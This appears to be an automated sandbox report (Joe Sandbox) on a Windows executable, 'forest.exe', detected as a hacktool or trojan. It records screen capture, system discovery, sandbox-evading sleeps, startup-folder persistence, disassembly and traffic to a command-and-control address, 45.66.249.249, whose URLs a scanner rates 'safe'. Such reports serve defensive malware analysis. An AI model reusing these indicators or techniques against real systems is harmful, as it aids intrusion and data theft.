_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75BCFA110
Source: C:\Users\user\Desktop\forest.exeAPI coverage: 6.1 %
Source: C:\Users\user\Desktop\forest.exe TID: 7664Thread sleep time: -95820s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\forest.exe TID: 7880Thread sleep time: -67588s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF9C80 GetFullPathNameW,GetFullPathNameW,FindFirstFileExW,GetLastError,FindClose,0_2_00007FF75BCF9C80
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD670D8 FindFirstFileExW,0_2_00007FF75BD670D8
Source: C:\Users\user\Desktop\forest.exeThread delayed: delay time: 95820Jump to behavior
Source: C:\Users\user\Desktop\forest.exeThread delayed: delay time: 67588Jump to behavior
Source: forest.exe, 00000000.00000002.2610006693.0000017E8231D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
Source: forest.exe, 00000000.00000002.2610006693.0000017E82378000.00000004.00000020.00020000.00000000.sdmp, forest.exe, 00000002.00000002.2609978471.0000023D858E5000.00000004.00000020.00020000.00000000.sdmp, forest.exe, 00000002.00000002.2609978471.0000023D85945000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD53BC4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75BD53BC4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD44AA4 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF75BD44AA4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD04940 RtlCreateProcessParametersEx,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlFreeHeap,RtlDestroyEnvironment,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75BD04940
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD53BC4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75BD53BC4
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD45B48 SetUnhandledExceptionFilter,0_2_00007FF75BD45B48
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD45968 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75BD45968
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD456B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75BD456B8
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD70280 cpuid 0_2_00007FF75BD70280
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoEx,0_2_00007FF75BD25C9C
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF75BD6ABC8
Source: C:\Users\user\Desktop\forest.exeCode function: EnumSystemLocalesW,0_2_00007FF75BD6AB30
Source: C:\Users\user\Desktop\forest.exeCode function: EnumSystemLocalesW,0_2_00007FF75BD6AA60
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoW,0_2_00007FF75BD6B01C
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF75BD6AF6C
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoW,0_2_00007FF75BD6AE14
Source: C:\Users\user\Desktop\forest.exeCode function: GetLocaleInfoW,0_2_00007FF75BD5EDBC
Source: C:\Users\user\Desktop\forest.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF75BD6B148
Source: C:\Users\user\Desktop\forest.exeCode function: EnumSystemLocalesW,0_2_00007FF75BD5E878
Source: C:\Users\user\Desktop\forest.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF75BD6A714
Source: C:\Users\user\Desktop\forest.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\forest.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD52CE0 GetSystemTimeAsFileTime,0_2_00007FF75BD52CE0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BCF46D0 SHTestTokenMembership,GetUserNameA,GetComputerNameA,GetModuleFileNameW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF75BCF46D0
Source: C:\Users\user\Desktop\forest.exeCode function: 0_2_00007FF75BD5FE9C _get_daylight,GetTimeZoneInformation,0_2_00007FF75BD5FE9C
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential Dumping2
System Time Discovery
Remote Services1
Screen Capture
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
2
Registry Run Keys / Startup Folder
11
Virtualization/Sandbox Evasion
LSASS Memory1
Query Registry
Remote Desktop Protocol1
Archive Collected Data
1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Process Injection
Security Account Manager31
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS11
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture1
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Process Discovery
SSHKeylogging1
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
Account Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
System Owner/User Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
System Network Configuration Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
File and Directory Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing32
System Information Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
forest.exe53%ReversingLabsWin64.Hacktool.Sysdupate
forest.exe100%AviraTR/Agent.jqxva
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://45.66.249.249:8443/0%Avira URL Cloudsafe
https://45.66.249.249:8443/bc0%Avira URL Cloudsafe
https://45.66.249.249:8443/bc-2476756634-10030%Avira URL Cloudsafe
https://45.66.249.249:8443/o0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://45.66.249.249:8443/bc-2476756634-1003forest.exe, 00000000.00000002.2610006693.0000017E8239C000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://45.66.249.249:8443/forest.exe, 00000002.00000002.2609978471.0000023D858E5000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://45.66.249.249:8443/bcforest.exe, 00000002.00000002.2609978471.0000023D85936000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://45.66.249.249:8443/oforest.exe, 00000000.00000002.2610006693.0000017E8231D000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
45.66.249.249
unknownRussian Federation
53356FREERANGECLOUDCAfalse
Joe Sandbox version:41.0.0 Charoite
Analysis ID:1513254
Start date and time:2024-09-18 17:03:15 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 34s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:7
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:forest.exe
Detection:MAL
Classification:mal60.winEXE@2/3@0/1
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 13
  • Number of non-executed functions: 153
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
  • Excluded IPs from analysis (whitelisted): 88.221.110.91, 2.16.100.168
  • Excluded domains from analysis (whitelisted): www.bing.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • VT rate limit hit for: forest.exe
TimeTypeDescription
11:04:08API Interceptor2x Sleep call for process: forest.exe modified
17:04:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsSVC.lnk
No context
No context
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
FREERANGECLOUDCAarm.elfGet hashmaliciousMirai, MoobotBrowse
  • 23.129.35.4
SecuriteInfo.com.Trojan.PWS.Siggen3.33653.31886.3628.exeGet hashmaliciousRaccoon Stealer v2Browse
  • 193.142.147.59
SecuriteInfo.com.Trojan.PackedNET.2334.3801.19434.exeGet hashmaliciousPureLog Stealer, Raccoon Stealer v2, SmokeLoaderBrowse
  • 193.142.147.59
Setup.exeGet hashmaliciousAsyncRAT, HTMLPhisher, Clipboard Hijacker, Phorpiex, PureLog Stealer, Raccoon Stealer v2, RedLineBrowse
  • 193.142.147.59
http://www.brookskushman.comGet hashmaliciousUnknownBrowse
  • 45.66.248.122
http://www.prestigetransportation.comGet hashmaliciousUnknownBrowse
  • 45.66.248.122
https://dutchpopp.comGet hashmaliciousUnknownBrowse
  • 45.66.248.122
http://muse.krazzykriss.comGet hashmaliciousUnknownBrowse
  • 45.66.248.122
https://muse.krazzykriss.com/Get hashmaliciousUnknownBrowse
  • 45.66.248.122
http://sallywilliamson.comGet hashmaliciousUnknownBrowse
  • 45.66.248.122
No context
No context
Process:C:\Users\user\Desktop\forest.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:dropped
Size (bytes):71954
Entropy (8bit):7.996617769952133
Encrypted:true
SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:false
Reputation:high, very likely benign file
Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
Process:C:\Users\user\Desktop\forest.exe
File Type:data
Category:modified
Size (bytes):328
Entropy (8bit):3.144086598890895
Encrypted:false
SSDEEP:6:kKBpF9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:J2DnLNkPlE99SNxAhUe/3
MD5:65D734559D1BF602D1C5E69516DB40AB
SHA1:499707125C311D82913EB313A7100A2026683396
SHA-256:E6ED5B468B9F8B1F4128CF7B0B6B85ACC5435B600D5315149F47DE7DEF44923A
SHA-512:FBD28B784922BCBEFE4CD93284FD6EF180520B592C8FB184BFA183F7C47F5AE42A06BC21DC7A7287162FB2C879475EED8B287B8A48A2797666B630401F984349
Malicious:false
Reputation:low
Preview:p...... ...........=....(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
Process:C:\Users\user\Desktop\forest.exe
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 5 13:18:55 2023, mtime=Wed Sep 18 14:04:20 2024, atime=Wed Sep 18 14:04:07 2024, length=688128, window=hide
Category:dropped
Size (bytes):583
Entropy (8bit):5.006006592692096
Encrypted:false
SSDEEP:12:8UkRqrlzYNbRcfiAKEyuOjA3D6nNkh1GmV:8UcnrvhuyAz8NFm
MD5:82C769EC863EC3EC7624DBE8EEA81D0A
SHA1:65CE88C01D579ED3157B60C0FB2B1D0175724A7F
SHA-256:CEA2569D56E2CF8FABFF7F5A36A66BDFCF30BCEF506A6ADE1B8FEFFB1DC17651
SHA-512:99DA7BD9CAA416D42870D9106D0074909B2408B81A2A4C98F1D6EFC261F27DFF731AB3D7CD6E62924AE0CADD476942FCAE91C9FB0D1D9179F3C53855E24EB993
Malicious:false
Reputation:low
Preview:L..................F.... ...j........A......k...................................P.O. .:i.....+00.:...:..,.LB.)...A&...&........P7....(......Ke.......`.2.....2Y.x .forest.exe..F......EW\r2Y.x....W.....................T...f.o.r.e.s.t...e.x.e.......P...............-.......O............s6D.....C:\Users\user\Desktop\forest.exe..'.....\.....\.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.f.o.r.e.s.t...e.x.e.`.......X.......688098...........hT..CrF.f4... .....c...-....-.hT..CrF.f4... .....c...-....-.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
File type:PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):6.412521677726676
TrID:
  • Win64 Executable GUI (202006/5) 92.65%
  • Win64 Executable (generic) (12005/4) 5.51%
  • Generic Win/DOS Executable (2004/3) 0.92%
  • DOS Executable Generic (2002/1) 0.92%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:forest.exe
File size:688'128 bytes
MD5:5242f809563eb3764684ef1180adb902
SHA1:491399cc669f92229d4a0c4a418067c5d4a808e8
SHA256:2a3519501362a44a4b122fbf869e195989741525883f07d0fc2d2e5e48fb7fff
SHA512:d8ab0ae014be8a70a6ad4c3e4d20dc5816b8a47eebf102b84aea0fcc2f4851f9162aa6fd1fe97d6cbaa213b9f392d679e451ea2ee3d99ea503e313b04a1acc49
SSDEEP:12288:T8RNDWKhjjr+8M7e0dcrG4e5DNBRfex4d2Ozr3ST80yjlDUjHi8B:YRBBNU7eA+6rs80i1qi8
TLSH:45E46C1BEAA801ECF27B913D88460516E7F0741B136267CF43E24A561F57AB5AF3E390
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'.~.Fz-.Fz-.Fz-o6y,.Fz-o6.,1Fz-.Fz-.Fz-..~,.Fz-..y,.Fz-...,.Fz-o6~,.Fz-o6|,.Fz-o6{,.Fz-.F{-.Fz-..s,.Fz-..y,.Fz-...-.Fz-..x,.Fz
Icon Hash:90cececece8e8eb0
Entrypoint:0x140055310
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x140000000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x65DD8785 [Tue Feb 27 06:56:05 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:6
OS Version Minor:0
File Version Major:6
File Version Minor:0
Subsystem Version Major:6
Subsystem Version Minor:0
Import Hash:d05eed5b28e2082c65759a421c6f3bfa
Instruction
dec eax
sub esp, 28h
call 00007F39A924DFE0h
dec eax
add esp, 28h
jmp 00007F39A924D5BFh
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007F39A924D752h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007F39A924D755h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007F39A924D74Dh
movzx eax, byte ptr [ecx+eax+03h]
and eax, FFFFFFF0h
dec esp
add ecx, eax
dec esp
xor ecx, edx
dec ecx
mov ecx, ecx
pop ebx
jmp 00007F39A924D0B6h
int3
dec eax
mov eax, esp
dec eax
mov dword ptr [eax+08h], ebx
dec eax
mov dword ptr [eax+10h], ebp
dec eax
mov dword ptr [eax+18h], esi
dec eax
mov dword ptr [eax+20h], edi
inc ecx
push esi
dec eax
sub esp, 20h
dec ecx
mov ebx, dword ptr [ecx+38h]
dec eax
mov esi, edx
dec ebp
mov esi, eax
dec eax
mov ebp, ecx
dec ecx
mov edx, ecx
dec eax
mov ecx, esi
dec ecx
mov edi, ecx
dec esp
lea eax, dword ptr [ebx+04h]
call 00007F39A924D6B1h
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x9ef000xdc.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE0xad0000x6a1.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0xa70000x4f38.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
IMAGE_DIRECTORY_ENTRY_BASERELOC0xae0000xeb0.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x93f900x70.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x93e500x140.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x860000x498.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x84cbe0x84e00ef82e1bbb6f3bd2c3dc8891f9649858eFalse0.4309791715663217data6.4533863281507715IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata0x860000x19e980x1a0002de47c4d6fb81fd4e30da2b81be8f271False0.40442833533653844data5.046197894214373IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data0xa00000x62ac0x24004046c0b27be31192214d9d2827b5b6e9False0.14876302083333334DOS executable (block device driver)3.755771211802524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata0xa70000x4f380x500051bc825de2c686cc52e24e2f2061d81aFalse0.47470703125data5.782404509379289IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA0xac0000x1f40x2002cd34d966d4eb1345d70df222888ef93False0.515625data4.194826601975507IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc0xad0000x6a10x800ed14081ccf3d265a70c0e3cdef8b46f7False0.3896484375data3.578208011982351IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0xae0000xeb00x100008882a3e3c0a0d4ff1f233e521bace2bFalse0.425048828125data5.30487461027706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountryZLIB Complexity
MUI0xad0f00xc8dataEnglishUnited States0.54
RT_VERSION0xad1b80x36cdataEnglishUnited States0.4577625570776256
RT_MANIFEST0xad5240x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
DLLImport
KERNEL32.dllGetLastError, FileTimeToSystemTime, GlobalAlloc, CloseHandle, DecodePointer, GetFileSize, DeleteCriticalSection, GetProcessHeap, SystemTimeToFileTime, WideCharToMultiByte, SystemTimeToTzSpecificLocalTime, GetComputerNameA, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, GetFileInformationByHandle, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, Sleep, MultiByteToWideChar, WaitForSingleObject, FindClose, InitializeCriticalSectionEx, CreatePipe, GetModuleFileNameW, FindNextFileW, GetOEMCP, GetACP, IsValidCodePage, HeapSize, SetFilePointerEx, GetFileSizeEx, GetConsoleOutputCP, FlushFileBuffers, ReadConsoleW, GetConsoleMode, SetStdHandle, GetCurrentDirectoryW, GetFullPathNameW, FindFirstFileExW, FreeEnvironmentStringsW, ReadFile, GetTimeZoneInformation, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, GetTimeFormatW, GetDateFormatW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, HeapReAlloc, HeapFree, HeapAlloc, WriteFile, GetStdHandle, GetStringTypeW, GetLocaleInfoEx, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LocalFree, LCMapStringEx, CompareStringEx, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateFileW, GetDriveTypeW, GetFileType, PeekNamedPipe, RtlUnwind
USER32.dllGetClientRect, ReleaseDC, GetDesktopWindow, GetDC
GDI32.dllSelectObject, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt, DeleteObject
ADVAPI32.dllGetUserNameA
SHELL32.dll
ole32.dllCoCreateInstance, CreateStreamOnHGlobal, CoUninitialize, CoInitialize
OLEAUT32.dllVariantClear
IPHLPAPI.DLLGetNetworkParams, GetAdaptersInfo, GetTcpTable
WS2_32.dllinet_ntoa, ntohs
gdiplus.dllGdiplusStartup, GdiplusShutdown, GdipSaveImageToStream, GdipGetImageEncodersSize, GdipFree, GdipDisposeImage, GdipCreateBitmapFromHBITMAP, GdipCloneImage, GdipAlloc, GdipGetImageEncoders
Language of compilation systemCountry where language is spokenMap
EnglishUnited States
TimestampSource PortDest PortSource IPDest IP
Sep 18, 2024 17:04:09.880287886 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:04:09.885463953 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:04:09.885600090 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:04:09.885798931 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:04:09.891619921 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:04:10.475348949 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:04:10.477408886 CEST497098080192.168.2.345.66.249.249
Sep 18, 2024 17:04:10.478400946 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:10.482266903 CEST80804970945.66.249.249192.168.2.3
Sep 18, 2024 17:04:10.483202934 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:10.483289003 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:10.485301018 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:10.490124941 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:11.063788891 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:11.064037085 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:11.064161062 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:11.072798967 CEST497108443192.168.2.345.66.249.249
Sep 18, 2024 17:04:11.080394030 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:11.256828070 CEST84434971045.66.249.249192.168.2.3
Sep 18, 2024 17:04:11.309240103 CEST497108443192.168.2.345.66.249.249
